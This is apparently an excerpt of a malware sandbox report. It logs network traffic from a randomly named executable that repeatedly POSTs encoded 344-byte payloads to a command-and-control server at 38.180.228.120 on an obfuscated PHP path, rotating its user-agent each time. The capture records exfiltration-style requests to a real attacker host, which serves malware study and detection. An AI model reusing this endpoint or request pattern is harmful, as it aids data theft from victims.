                                                  Nov 19, 2024 18:52:59.521519899 CET4996280192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:52:59.526348114 CET804996238.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:52:59.818136930 CET804996238.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:52:59.865009069 CET4996280192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:53:00.131679058 CET4996280192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:53:10.139437914 CET4997580192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:53:10.144898891 CET804997538.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:53:10.145009041 CET4997580192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:53:10.145323038 CET4997580192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:53:10.150304079 CET804997538.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:53:10.493841887 CET4997580192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:53:10.500267029 CET804997538.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:53:10.785850048 CET804997538.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:53:10.833745003 CET4997580192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:53:10.913754940 CET804997538.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:53:10.958722115 CET4997580192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:53:11.226902008 CET4997580192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:53:22.603790045 CET4997680192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:53:22.609214067 CET804997638.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:53:22.609678984 CET4997680192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:53:22.609935999 CET4997680192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:53:22.614850044 CET804997638.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:53:22.958986998 CET4997680192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:53:22.964184999 CET804997638.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:53:23.262121916 CET804997638.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:53:23.318092108 CET4997680192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:53:23.688823938 CET4997680192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:53:32.761626005 CET4997780192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:53:32.769062042 CET804997738.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:53:32.769172907 CET4997780192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:53:32.769346952 CET4997780192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:53:32.775290966 CET804997738.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:53:33.115202904 CET4997780192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:53:33.120079994 CET804997738.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:53:33.436414957 CET804997738.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:53:33.489962101 CET4997780192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:53:33.563729048 CET804997738.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:53:33.614993095 CET4997780192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:53:33.836756945 CET4997780192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:53:45.292994976 CET4997880192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:53:45.298158884 CET804997838.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:53:45.298383951 CET4997880192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:53:45.298579931 CET4997880192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:53:45.303396940 CET804997838.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:53:45.646473885 CET4997880192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:53:45.651583910 CET804997838.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:53:46.097109079 CET804997838.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:53:46.146219015 CET4997880192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:53:46.391872883 CET4997880192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:53:58.532315969 CET4997980192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:53:58.537240028 CET804997938.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:53:58.539555073 CET4997980192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:53:58.539840937 CET4997980192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:53:58.544682026 CET804997938.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:53:58.899311066 CET4997980192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:53:58.904356956 CET804997938.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:53:59.181468964 CET804997938.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:53:59.315306902 CET804997938.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:53:59.315380096 CET4997980192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:53:59.967740059 CET4997980192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:54:08.740344048 CET4998080192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:54:08.745490074 CET804998038.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:54:08.745609045 CET4998080192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:54:08.745819092 CET4998080192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:54:08.750648975 CET804998038.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:54:09.099478960 CET4998080192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:54:09.104460955 CET804998038.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:54:09.389152050 CET804998038.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:54:09.443063021 CET4998080192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:54:09.486042023 CET4998080192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:54:20.173433065 CET4998180192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:54:20.179496050 CET804998138.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:54:20.179574013 CET4998180192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:54:20.179734945 CET4998180192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:54:20.186085939 CET804998138.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:54:20.536990881 CET4998180192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:54:20.541974068 CET804998138.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:54:20.817892075 CET804998138.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:54:20.864943981 CET4998180192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:54:20.905622005 CET4998180192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:54:29.557579041 CET4998280192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:54:29.562526941 CET804998238.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:54:29.562649965 CET4998280192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:54:29.562922001 CET4998280192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:54:29.567766905 CET804998238.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:54:29.912136078 CET4998280192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:54:29.917186975 CET804998238.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:54:30.216788054 CET804998238.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:54:30.271239042 CET4998280192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:54:30.349965096 CET804998238.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:54:30.396250963 CET4998280192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:54:30.436055899 CET4998280192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:54:41.144601107 CET4998380192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:54:41.149784088 CET804998338.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:54:41.149883032 CET4998380192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:54:41.150063992 CET4998380192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:54:41.155004025 CET804998338.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:54:41.505825996 CET4998380192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:54:41.510842085 CET804998338.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:54:41.815114975 CET804998338.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:54:41.865014076 CET4998380192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:54:41.895504951 CET4998380192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:54:50.431807041 CET4998480192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:54:50.437000036 CET804998438.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:54:50.437069893 CET4998480192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:54:50.437344074 CET4998480192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:54:50.443125963 CET804998438.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:54:50.787081957 CET4998480192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:54:50.792359114 CET804998438.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:54:51.059525967 CET804998438.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:54:51.099420071 CET4998480192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:54:51.135907888 CET4998480192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:01.742755890 CET4998580192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:01.747972965 CET804998538.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:55:01.748104095 CET4998580192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:01.748260975 CET4998580192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:01.753058910 CET804998538.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:55:02.099694014 CET4998580192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:02.106059074 CET804998538.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:55:02.391093016 CET804998538.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:55:02.443240881 CET4998580192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:02.525419950 CET804998538.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:55:02.568150043 CET4998580192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:02.608275890 CET4998580192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:13.943058968 CET4998680192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:13.947988987 CET804998638.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:55:13.948096991 CET4998680192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:13.948293924 CET4998680192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:13.956332922 CET804998638.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:55:14.302742004 CET4998680192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:14.307708979 CET804998638.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:55:14.567323923 CET804998638.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:55:14.615046978 CET4998680192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:14.696804047 CET804998638.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:55:14.740051985 CET4998680192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:14.801379919 CET4998680192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:24.003719091 CET4998780192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:24.009162903 CET804998738.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:55:24.009428024 CET4998780192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:24.009685993 CET4998780192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:24.014532089 CET804998738.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:55:24.365673065 CET4998780192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:24.370810032 CET804998738.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:55:24.637973070 CET804998738.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:55:24.693634033 CET4998780192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:24.769146919 CET804998738.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:55:24.818681955 CET4998780192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:25.277937889 CET4998780192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:34.577538013 CET4998880192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:34.582511902 CET804998838.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:55:34.582640886 CET4998880192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:34.582887888 CET4998880192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:34.587749004 CET804998838.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:55:34.927855968 CET4998880192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:34.932760954 CET804998838.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:55:35.236042023 CET804998838.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:55:35.287033081 CET4998880192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:35.371102095 CET804998838.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:55:35.412009954 CET4998880192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:35.458297014 CET4998880192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:46.203206062 CET4998980192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:46.208287001 CET804998938.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:55:46.208410978 CET4998980192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:46.208605051 CET4998980192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:46.213486910 CET804998938.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:55:46.552829027 CET4998980192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:46.557823896 CET804998938.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:55:46.828692913 CET804998938.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:55:46.880784035 CET4998980192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:46.940787077 CET4998980192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:57.621359110 CET4999080192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:57.626440048 CET804999038.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:55:57.626513004 CET4999080192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:57.626796007 CET4999080192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:57.631541014 CET804999038.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:55:57.974956036 CET4999080192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:57.979783058 CET804999038.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:55:58.454690933 CET804999038.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:55:58.455607891 CET804999038.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:55:58.455622911 CET804999038.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:55:58.455712080 CET4999080192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:58.874028921 CET4999080192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:56:08.013892889 CET4999180192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:56:08.018763065 CET804999138.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:56:08.018841028 CET4999180192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:56:08.019062996 CET4999180192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:56:08.023873091 CET804999138.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:56:08.365339041 CET4999180192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:56:08.400876045 CET804999138.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:56:08.669126034 CET804999138.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:56:08.708972931 CET4999180192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:56:08.740361929 CET4999180192.168.2.738.180.228.120

                                                  HTTP Request Dependency Graph

                                                  • 38.180.228.120

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.74974238.180.228.120807644C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 19, 2024 18:52:21.881669998 CET450OUTPOST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1
                                                  Content-Type: application/octet-stream
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                  Host: 38.180.228.120
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Nov 19, 2024 18:52:22.241193056 CET344OUTData Raw: 05 00 01 02 06 0a 01 05 05 06 02 01 02 0d 01 04 00 0a 05 01 02 01 03 0e 02 0f 0d 0c 04 04 00 50 0f 56 06 0d 07 00 03 00 0f 0b 07 04 04 05 07 53 06 54 0c 5d 0d 07 06 02 04 55 03 00 06 50 04 01 00 54 0e 0f 00 00 01 03 0f 01 0d 00 0a 03 0f 09 05 51
                                                  Data Ascii: PVST]UPTQ^UQ\L~@|a\w[r]b[]Poj^cUs\ksh{glYi[|Sx`Is[u~V@{C\~bi
                                                  Nov 19, 2024 18:52:22.530540943 CET25INHTTP/1.1 100 Continue
                                                  Nov 19, 2024 18:52:22.662048101 CET493INHTTP/1.1 404 Not Found
                                                  Date: Tue, 19 Nov 2024 17:52:22 GMT
                                                  Server: Apache/2.4.41 (Ubuntu)
                                                  Content-Length: 276
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 33 38 2e 31 38 30 2e 32 32 38 2e 31 32 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.74982238.180.228.120807996C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 19, 2024 18:52:34.766849041 CET467OUTPOST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1
                                                  Content-Type: application/octet-stream
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                  Host: 38.180.228.120
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Nov 19, 2024 18:52:35.236293077 CET344OUTData Raw: 05 02 01 00 06 0f 01 04 05 06 02 01 02 03 01 06 00 05 05 0d 02 05 03 08 02 52 0d 02 05 0f 03 05 0c 06 05 0d 03 0d 06 01 0c 54 06 0b 06 05 04 07 05 05 0d 0a 0f 03 05 52 06 03 05 01 04 05 06 0e 05 01 0a 0a 00 07 05 02 0d 03 0d 02 0f 00 0e 08 07 57
                                                  Data Ascii: RTRWS^R\L}P`_[criae`|letBl|]toBwKxs}X}~pct`~O~V@{mn}bq
                                                  Nov 19, 2024 18:52:35.389852047 CET25INHTTP/1.1 100 Continue
                                                  Nov 19, 2024 18:52:35.520869017 CET493INHTTP/1.1 404 Not Found
                                                  Date: Tue, 19 Nov 2024 17:52:35 GMT
                                                  Server: Apache/2.4.41 (Ubuntu)
                                                  Content-Length: 276
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 33 38 2e 31 38 30 2e 32 32 38 2e 31 32 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.74988238.180.228.120801412C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 19, 2024 18:52:45.433948040 CET414OUTPOST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1
                                                  Content-Type: application/octet-stream
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                  Host: 38.180.228.120
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Nov 19, 2024 18:52:45.787472010 CET344OUTData Raw: 00 06 01 02 06 0d 01 02 05 06 02 01 02 07 01 07 00 01 05 00 02 03 03 09 03 04 0d 00 05 07 03 09 0d 0f 03 09 01 54 03 0a 0e 05 07 05 04 07 07 04 04 50 0f 08 0c 07 04 05 07 03 06 54 04 05 07 5d 00 53 0a 00 04 0e 05 05 0e 04 0c 01 0f 00 0c 54 05 04
                                                  Data Ascii: TPT]ST]XU\L}S|cu\`[qbehAhlzYclZMxDoBElYv}}|vg{Zie~V@A{}~~Lu
                                                  Nov 19, 2024 18:52:46.052722931 CET25INHTTP/1.1 100 Continue
                                                  Nov 19, 2024 18:52:46.184705019 CET493INHTTP/1.1 404 Not Found
                                                  Date: Tue, 19 Nov 2024 17:52:45 GMT
                                                  Server: Apache/2.4.41 (Ubuntu)
                                                  Content-Length: 276
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 33 38 2e 31 38 30 2e 32 32 38 2e 31 32 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.2.74996238.180.228.120803232C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 19, 2024 18:52:59.172427893 CET467OUTPOST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1
                                                  Content-Type: application/octet-stream
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                  Host: 38.180.228.120
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Nov 19, 2024 18:52:59.521519899 CET344OUTData Raw: 00 0a 04 05 03 08 01 04 05 06 02 01 02 02 01 0a 00 01 05 0f 02 01 03 09 02 56 0f 57 06 02 03 05 0e 0f 04 0f 03 06 04 0b 0c 54 06 03 07 04 04 0e 07 07 0e 01 0f 03 06 06 07 02 05 00 04 0a 06 08 03 01 0e 0f 07 0e 07 51 0b 00 0d 0e 0c 03 0e 09 07 06
                                                  Data Ascii: VWTQW_UR\L}PhN~@vbyaflk|\^wRw]~cpK{l]zs}Yk|tI^ju~V@zm~~bu
                                                  Nov 19, 2024 18:52:59.818136930 CET518INHTTP/1.1 100 Continue
